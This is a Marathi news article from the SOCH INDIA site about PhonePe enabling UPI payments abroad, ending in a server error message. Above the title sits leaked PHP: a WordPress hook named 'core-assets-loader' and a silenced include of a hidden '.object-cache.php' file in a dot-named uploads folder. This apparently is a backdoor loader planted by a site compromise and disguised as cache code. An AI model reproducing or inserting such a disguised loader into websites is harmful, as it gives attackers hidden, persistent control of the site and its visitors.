add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); PhonePe : फोनपे यूजर्ससाठी गुड न्यूज, आता देशाबाहेर करता येणार UPI पेमेंट – SOCH INDIA
Menu

देश
PhonePe : फोनपे यूजर्ससाठी गुड न्यूज, आता देशाबाहेर करता येणार UPI पेमेंट

nobanner

डिजिटल पेमेंट प्लॅटफॉर्म फोनपे (PhonePe) ने एक नवीन सर्विस सुरू करीत असल्याची घोषणा केली आहे. यूजर्सला आता यूपीआयच्या माध्यमातून इंटरनॅशनल पेमेंट करण्याची सुविधा मिळू शकणार आहे. जर तुम्ही अन्य दुसऱ्या देशात जात असाल तसेच त्या ठिकाणी काही खरेदी करायची असेल तर तुम्ही फोन पेवरून पेमेंट करू शकता.

या देशात करू शकता पेमेंट
नवीन सुविधेची सुरुवात करताना कंपनीने सांगितले की, फोन पे यूजर्सला आता सिंगापूर, संयुक्त अरब अमीरात (यूएई), भुतान आणि नेपाळ मधील कोणत्याही आंतरराष्ट्रीय व्यापाऱ्याला पेमेंट करता येवू शकते. ज्यांच्याकडे स्थानिक क्यूआर कोड आहे. कंपनीची नवीन सुविधेला एआयपीएल (एनपीसीआय इंटरनॅशनल पेमेंट्स लिमिटेड) ची मदतीने घेतली आहे. कंपनीच्या म्हणण्यानुसार, लवकरच अन्य देशात यूपीआय पेमेंटला सक्षम केले जावू शकते.

यूपीआय इंटरनॅशनल
फोन पेच्या म्हणण्यानुसार, कंपनी लवकरच यूपीआय इंटरनॅशनल पेमेंट सर्विसला अन्य देशात आणण्याची योजना बनवत आहे. भारतीय राष्ट्रीय भुगतान निगम (NCPI) ने वरील देशात इंटरनॅशनल यूपीआय पेमेंटच्या समर्थनाची घोषणा केली आहे.

वाचाः Jio वर भारी हा Airtel रिचार्ज प्लान! १९९ रुपयात फ्री डेटा आणि कॉलिंग

असा करता येणार वापर
PhonePe यूजर्सला यासाठी प्रवासाआधी आपल्या फोन पे अॅपवर यूपीआय इंटरनॅशनलला अॅक्टिवेट करावे लागेल. यासाठी यूजर्स यूपीआय बँक अकाउंटला लिक करू शकतात. कंपनीच्या म्हणण्यानुसार ही प्रक्रिया सुरक्षित आहे. सर्विसला अॅक्टिवेट करण्यासाठी यूजर्सला आपला यूपीआय पिन टाकावा लागेल. कंपनीच्या म्हणण्यानुसार, हे पेमेंट भारतीय बँकांचे उपयोग केला जावू शकतो. तसेच ज्यांना पैसे पाठवले त्यांना त्यांच्या करन्सीमध्ये पैसे मिळतील. हे इंटरनॅशनल क्रेडिट, डेबिट आणि फॉरेक्स कार्डच्या आवश्यकतेला समाप्त करू शकते.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.